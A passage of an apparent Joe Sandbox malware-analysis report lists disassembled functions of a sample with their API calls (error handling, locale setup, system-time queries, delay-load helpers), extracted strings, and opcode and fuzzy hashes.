                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window
                                                    • String ID: 0[[
                                                    • API String ID: 2353593579-2128359521
                                                    • Opcode ID: 63a6d579a9ee785529bd9d48f1bb4ed647672488a7adb37cd095b0bbfbece5d4
                                                    • Instruction ID: 6f807d5f75b48f7d66b98ed60028dd75887c13f39a6b4bafd9eaf6727143b428
                                                    • Opcode Fuzzy Hash: 63a6d579a9ee785529bd9d48f1bb4ed647672488a7adb37cd095b0bbfbece5d4
                                                    • Instruction Fuzzy Hash: 23217A716007059FDB29DF65D855B6BBBF5FF04B20F00CA2CE46A8B6A0CB31A904CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00395730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0039575B
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003957BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                    • String ID: bad locale name
                                                    • API String ID: 3988782225-1405518554
                                                    • Opcode ID: 213ae38b8dd237caaa8471dd88203d9dd18ead522d7dafa81a1f8fb924908408
                                                    • Instruction ID: a0fbbbd02f15aa512ee1fc72d9f87cb9b4137cfd1a53719e401d62b4806a3ffc
                                                    • Opcode Fuzzy Hash: 213ae38b8dd237caaa8471dd88203d9dd18ead522d7dafa81a1f8fb924908408
                                                    • Instruction Fuzzy Hash: 3E21F170A05B84DFDB21CF68C90478ABFF4BF15700F14869DE48987781D7B5AA04CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00529AE2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(0062E920,0000000C,0062E900,00000008), ref: 00529B31
                                                    • ExitThread.KERNEL32 ref: 00529B38
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorExitLastThread
                                                    • String ID: `{5
                                                    • API String ID: 1611280651-770602540
                                                    • Opcode ID: b5dca881f08fd864e31158602f07e76ecee259caf4ac6359d918184de82cd9a4
                                                    • Instruction ID: 0860ff9aa95129a70f494fff33b2c2ebadaa29d433857325904d5757da7896f2
                                                    • Opcode Fuzzy Hash: b5dca881f08fd864e31158602f07e76ecee259caf4ac6359d918184de82cd9a4
                                                    • Instruction Fuzzy Hash: A411CE75E04A29AFCB01ABB0E80EB6E7F20FF82710F100249F401572E2DB706A049B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0051D283 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualQuery.KERNEL32(80000000,0051D1C8,0000001C,0051D3BD,00000000,?,?,?,?,?,?,?,0051D1C8,00000004,006378D4,0051D44D), ref: 0051D294
                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0051D1C8,00000004,006378D4,0051D44D), ref: 0051D2AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: InfoQuerySystemVirtual
                                                    • String ID: D
                                                    • API String ID: 401686933-2746444292
                                                    • Opcode ID: 54ef9924145364e43ab06d6db65114d23be6b4cb48631fa2cf013054f9dbcedc
                                                    • Instruction ID: cc11f1cf6960c75e92b4fd46d0d6466904916de86e194e326209e6efe2709128
                                                    • Opcode Fuzzy Hash: 54ef9924145364e43ab06d6db65114d23be6b4cb48631fa2cf013054f9dbcedc
                                                    • Instruction Fuzzy Hash: CD01F776A001096BDB14DE69DC05BED7BBAFFC4324F0CC120ED29D7240DA38D946C690
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036324B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • 4Vc, xrefs: 0036328D
                                                    • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00363252
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: 4Vc$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                    • API String ID: 2558294473-343011873
                                                    • Opcode ID: c63248a2ae9ee8fd1cb96457316ae664a0011d0b154b5a847c35cadceace45bc
                                                    • Instruction ID: 2e4589a3cb2018683f7227a83dd177da10d9f48c3064892b0c2000851b73b2eb
                                                    • Opcode Fuzzy Hash: c63248a2ae9ee8fd1cb96457316ae664a0011d0b154b5a847c35cadceace45bc
                                                    • Instruction Fuzzy Hash: 8A117930D05298DFCF05DBE4CD54B9DBBB5BF55308F508098D002AB295EBB46E08CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003635B9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • 4Vc, xrefs: 003635FE
                                                    • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 003635C3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: 4Vc$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                    • API String ID: 2558294473-343011873
                                                    • Opcode ID: 57c571ab13d54a1c6c2a209b7206ebd28e883f0043991129a35fcdd0f23e1b0c
                                                    • Instruction ID: 8a047e9de26fe199e2e2b53395d893a03701a7a2217e71c3bca2a3d9b01f41ba
                                                    • Opcode Fuzzy Hash: 57c571ab13d54a1c6c2a209b7206ebd28e883f0043991129a35fcdd0f23e1b0c
                                                    • Instruction Fuzzy Hash: E7117934D05298EFCB05DBE4CE54ADDBBB5BF55308F50809CD001AB296DBB46A08CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003632DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • 4Vc, xrefs: 0036331D
                                                    • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 003632E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: 4Vc$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                    • API String ID: 2558294473-343011873
                                                    • Opcode ID: f62b17e3abd777e837d9869f689bb76c09d270859d28ec5fd7486f87c34fe190
                                                    • Instruction ID: 1ef81301b84a2e0dbff19bf074a1bbcaec6430d1c8f3972fb4288d033947c89e
                                                    • Opcode Fuzzy Hash: f62b17e3abd777e837d9869f689bb76c09d270859d28ec5fd7486f87c34fe190
                                                    • Instruction Fuzzy Hash: 7D115734905288DECF05DBE8C954B9DBFB5BF55308F608098D002AB295EBB55B09CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036364F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • 4Vc, xrefs: 00363691
                                                    • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00363654
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: 4Vc$C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp
                                                    • API String ID: 2558294473-343011873
                                                    • Opcode ID: 138b804519865c529c5c989e708fb6db8205561c045681c80e57a798d4187442
                                                    • Instruction ID: 543eb82c509354d2be63d1c23ff05bd889f70ff2a9f3c529d9503a159714f957
                                                    • Opcode Fuzzy Hash: 138b804519865c529c5c989e708fb6db8205561c045681c80e57a798d4187442
                                                    • Instruction Fuzzy Hash: 4C115B34D05288EECF05DBE4C954B9DBBB5BF55304F60809DD0016B295DBB55B09CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037806F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(0000000F), ref: 003780A2
                                                    Strings
                                                    • C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 00378087
                                                    • Unknown exception, xrefs: 00378077
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Parent
                                                    • String ID: C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
                                                    • API String ID: 975332729-9186675
                                                    • Opcode ID: bd8371261fc212afb19fbd4ff932e82998b10a28642c2e46a32b176a6c8f835e
                                                    • Instruction ID: a8d96acf954632642a132cdc2bb0c9842e74952789daa75076dfc77b0ddd5503
                                                    • Opcode Fuzzy Hash: bd8371261fc212afb19fbd4ff932e82998b10a28642c2e46a32b176a6c8f835e
                                                    • Instruction Fuzzy Hash: 64016D34D05288EFCB05EBE4C915BDDBFB0BF15304F548498E4416B296DBB9AE08DB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003636E2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • Unknown exception, xrefs: 003636EA
                                                    • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 003636FD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                    • API String ID: 2558294473-2631306498
                                                    • Opcode ID: 362a54f916b4b1922e5808c7a6ddb2db203dbf32ec78bf616afbac99ca241455
                                                    • Instruction ID: 40fa72c44b57d6d48269df22d4b8fe32753ce6e961d420850f93b659ae800bb0
                                                    • Opcode Fuzzy Hash: 362a54f916b4b1922e5808c7a6ddb2db203dbf32ec78bf616afbac99ca241455
                                                    • Instruction Fuzzy Hash: 33014C34D05288EECF06EBE8C955BCDBFB0BF55304F548498D4416B296DBB46B08D792
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036336E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • Unknown exception, xrefs: 00363376
                                                    • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00363386
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ActiveWindow
                                                    • String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                    • API String ID: 2558294473-2631306498
                                                    • Opcode ID: 5d6a7558db040a52ec92d27c354f7e528ac9d34e198062307766de5447e38805
                                                    • Instruction ID: 8c468e2596892e4a1304ebdfa1bccbc2faf9c64bb6a1b72354045abb438dd172
                                                    • Opcode Fuzzy Hash: 5d6a7558db040a52ec92d27c354f7e528ac9d34e198062307766de5447e38805
                                                    • Instruction Fuzzy Hash: 14014C34D05288DECF06DBE4C915BDDBFB0BF55304F548498D4416B296DBB45B08D7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0051F694 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00369C30: InitializeCriticalSectionAndSpinCount.KERNEL32(00637D50,00000000,D13B3340,00350000,Function_001F7F70,000000FF,?,0051F6C3,?,?,?,00357586), ref: 00369C55
                                                      • Part of subcall function 00369C30: GetLastError.KERNEL32(?,0051F6C3,?,?,?,00357586), ref: 00369C5F
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00357586), ref: 0051F6C7
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00357586), ref: 0051F6D6
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0051F6D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 450123788-631824599
                                                    • Opcode ID: 1d3eb5016dbf4a9319d8528e537a06f9e42dfa7230b27fce57d65e4e9714b1b1
                                                    • Instruction ID: 0f7a9b74110c1e2990743818220f01511abbc93f059eddf51fe0791374273c3d
                                                    • Opcode Fuzzy Hash: 1d3eb5016dbf4a9319d8528e537a06f9e42dfa7230b27fce57d65e4e9714b1b1
                                                    • Instruction Fuzzy Hash: 83E092742007518FE330DF64E9087967FE4BF15344F00882DE886C3651EBB5D488CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0051F66E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15timeCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,0051F431,?,?,?,?,00486881), ref: 0051F687
                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,0051F431,?,?,?,?,00486881), ref: 0051F68B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Time$FileSystem$Precise
                                                    • String ID: `{5
                                                    • API String ID: 743729956-770602540
                                                    • Opcode ID: af41de1182a180c4f64f0c1ee8cfd2a2c22e34cc25255464d6ca8193dca370c5
                                                    • Instruction ID: 2f1ce8bfc11aba81a26a1118054ad07433b696381991502f350def1852bd76f7
                                                    • Opcode Fuzzy Hash: af41de1182a180c4f64f0c1ee8cfd2a2c22e34cc25255464d6ca8193dca370c5
                                                    • Instruction Fuzzy Hash: C1D01236905938DB9B113B94FD045FD7F19FF09B513090169E9065B130CF715C51ABD5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00546D5B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00546D52
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: [mT$mT
                                                    • API String ID: 697777088-2281772909
                                                    • Opcode ID: a560672251ff35dddbcd660b67327c245a1f4a18108a2c1ace6fa3500a83ad85
                                                    • Instruction ID: 453eab86b4f4726bc2868a980a15c66393e329d46c3299f9be1a65a094e3ad25
                                                    • Opcode Fuzzy Hash: a560672251ff35dddbcd660b67327c245a1f4a18108a2c1ace6fa3500a83ad85
                                                    • Instruction Fuzzy Hash: 41B012D135D5127C3148530C7C07D7609EDD0C1B14731853AF400C8040D4C05C8024B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00546D40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00546D52
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: @mT$mT
                                                    • API String ID: 697777088-2794769345
                                                    • Opcode ID: d91c323495dd08885a82312959675fd045293117090ef6780b33706cd2aa38d9
                                                    • Instruction ID: 0c94cc489425d7caf45523e5bc70cacbdc29cb5123cc64fce2d2c779665345ad
                                                    • Opcode Fuzzy Hash: d91c323495dd08885a82312959675fd045293117090ef6780b33706cd2aa38d9
                                                    • Instruction Fuzzy Hash: E2B012E135C4117D3108130C7D07C760DEDE0D1B15B31843AF401C804095C05C4114B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00546D79 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00546D52
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
